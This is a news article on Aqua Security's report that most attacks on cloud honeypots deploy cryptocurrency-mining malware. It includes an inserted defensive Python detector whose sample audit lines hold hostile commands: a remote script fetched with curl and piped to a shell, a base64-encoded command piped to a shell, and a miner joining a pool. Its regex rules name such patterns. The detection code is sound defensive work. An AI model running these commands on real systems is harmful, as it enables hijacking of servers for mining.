Almost All Cyber Attacks on Cloud Servers Involve Cryptocurrency Mining, a New Study Found


Most attacks targeting cloud infrastructure deploy cryptocurrency mining malware rather than execute other forms of cyber attacks, a study by Aqua Security found. The study, which took place between June 2019 and July 2020, analyzed over 16,371 attacks on honeypot servers. The decoys were deployed to study the pattern of cyber-attacks on cloud servers. The researchers noted that these forms of attacks increased by up to 250% from the previous year. This development was because the attack landscape shifted towards organized cybercrime, where criminal gangs invested in more cloud infrastructure, the researchers said.

Cryptocurrency mining cyber attacks most prominent on cloud servers

Aqua’s “2020 Cloud Native Threat Report” noted that hackers attempted to take over cloud servers and deploy malicious containers and server images. Most of the images (95%) were aimed at mining cryptocurrency instead of exfiltrating sensitive data or executing other forms of cyber-attacks. The researchers noted that only 5% of the containers deployed on cloud servers were used in executing DDoS attacks.

Cyber attacks shifted towards organized cybercrime

Aqua Security researchers discovered that the threat landscape shifted towards organized cybercrime rather than individual hackers working alone. This allowed threat actors to invest in more cybercrime infrastructure, leading to increased frequency and sophistication of cyber attacks targeting cloud servers.

Intrusion methods are also diversified because of the collaboration between various threat actors. The report authors speculated that the trend was expected to continue as attackers diversified the attack vectors and objectives.

Some notable exploit methods highlighted by the researchers included the exploitation of unpatched systems, scanning exposed cloud servers or those with open passwords, and brute force attacks. Attacks on misconfigured servers also rose sharply at the beginning of the year.

Cybercrime gangs also conducted supply chain cyber attacks against companies managing cloud computing infrastructure. These forms of cyber attacks allowed them to compromise more accounts for deploying their cryptocurrency mining malware.

Increasingly sophisticated cryptocurrency mining malware

The deployment of malware in public registries also became a common method of installing cryptocurrency mining malware. These images remained dormant and activated once the containers were deployed on cloud servers. By doing so, the hackers could distribute their malware to more cloud server instances without necessarily breaching the systems.

Aqua researchers also found that there was an increase in the complexity of cryptocurrency mining malware. The rogue software could perform advanced functions to cement its domination of the cloud servers.

For example, attackers deployed multi-stage payloads and applied 64-bit encoding to avoid detection. The attackers also disabled rivals’ cryptocurrency mining malware to maintain exclusive control of the hijacked cloud servers. Kicking rivals off the server freed them from the need to compete for resources on the compromised cloud servers.
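As an added illustration (not code from Aqua’s report or this article), a small Python heuristic that flags the behaviours described above in constructed container exec-audit lines: stratum pool connections, known miner binaries, base64-wrapped commands piped to a shell, and the eviction of rival miners. The sample lines, rule names and miner binary names are assumptions made for the example.

```python
import base64
import re

# Constructed sample container exec-audit lines (not real telemetry).
SAMPLE_LINES = [
    "2020-06-12T03:14:07Z exec: curl -s http://example.invalid/s.sh | sh",
    "2020-06-12T03:14:09Z exec: echo cGtpbGwgLWYgeG1yaWc= | base64 -d | sh",
    "2020-06-12T03:14:11Z exec: ./kthreadd -o stratum+tcp://pool.example.invalid:3333 -u WALLET_PLACEHOLDER",
    "2020-06-12T03:14:15Z exec: apt-get install -y nginx",
]

# Assumed list of common miner binary names used by the rival-eviction rule.
MINER_NAMES = ("xmrig", "minerd", "cpuminer", "kdevtmpfsi", "kinsing")

# Heuristic rules; each regex is tested against the command plus any decoded base64 it carries.
RULES = {
    "stratum_pool": re.compile(r"stratum\+(tcp|ssl)://", re.I),
    "known_miner": re.compile("|".join(MINER_NAMES), re.I),
    "rival_kill": re.compile(r"\b(pkill|killall|kill)\b.*(" + "|".join(MINER_NAMES) + ")", re.I),
    "encoded_exec": re.compile(r"base64\s+(-d|--decode).*\|\s*(sh|bash)", re.I),
    "remote_script": re.compile(r"(curl|wget)\b.*\|\s*(sh|bash)", re.I),
}


def decode_inline_base64(cmd):
    """Return the decoded text of any base64-looking chunks in the command, so that
    a miner kill or download hidden behind encoding is still visible to the rules."""
    out = []
    for chunk in re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", cmd):
        try:
            out.append(base64.b64decode(chunk, validate=True).decode("utf-8", "replace"))
        except Exception:
            pass  # not valid base64; ignore the chunk
    return " ".join(out)


def classify(line):
    """Return the names of the rules that fire on one audit line (empty list = benign)."""
    cmd = line.split("exec: ", 1)[-1]
    view = cmd + " " + decode_inline_base64(cmd)
    return [name for name, rx in RULES.items() if rx.search(view)]


def scan(lines):
    """Map each suspicious line to the rules it triggered; benign lines are dropped."""
    hits = {}
    for line in lines:
        names = classify(line)
        if names:
            hits[line] = names
    return hits


if __name__ == "__main__":
    for line, names in scan(SAMPLE_LINES).items():
        print(names, line)
```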

Aqua’s report also found that profit-making was the primary motivation of the threat actors. This motive influenced their decision to focus on cryptocurrency mining instead of other forms of attacks.


Commenting on the increased frequency of cryptocurrency mining cyber attacks targeted at cloud servers, Javvad Malik, a Security Awareness Advocate at KnowBe4, says:

“There are no digital resources that criminals can’t find a way to take advantage of. Whether that be an account credential, an unsecured cloud server, or an unclaimed domain name. All of these can be directly or indirectly exploited to launch attacks or make money. It’s why organizations should not only focus on the impact of threats but the root causes and finding ways to close those avenues. This translates to having a culture of security in which all aspects of security, from design, implementation, to assurance is considered to ensure that an organization’s digital assets are a less attractive target for criminals.”

Source: CPO Magazine
